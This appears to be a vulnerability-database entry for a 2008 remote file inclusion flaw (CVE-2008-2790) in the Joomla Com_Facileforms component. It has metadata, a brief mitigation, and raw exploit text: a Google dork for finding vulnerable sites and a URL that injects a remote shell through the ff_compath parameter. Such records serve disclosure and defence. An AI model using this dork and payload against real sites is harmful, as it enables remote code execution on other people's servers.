Joomla Component Com_Facileforms

vendor:

by:

Dr.Kacak

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Joomla Component Com_Facileforms

Affected Version From: Joomla Component Com_Facileforms 1.0

Affected Version To: Joomla Component Com_Facileforms 1.0

Patch Exists: YES

Related CWE: CVE-2008-2790

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Joomla Component Com_Facileforms

Joomla Component Com_Facileforms is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application.

Source

Exploit-DB raw data:

Title: Joomla Component Com_Facileforms

================================================================

[+] Author : Dr.Kacak
[+] Special Thankz : KnocKout and all my friends
[+] System 0VerfL0verZ

=================================================================

Script : Joomla

Google Dork : index.php?option=com_facileforms

Error Code : facileforms.frame.php?ff_compath=

Bug Fix Advice : Undefined deÄŸerler, tanÄ±mlanmalÄ±dÄ±r.

###############################################################

< -- bug code start -- >

www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]

/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]

< -- bug code end of -- >

# milw0rm.com [2008-06-23]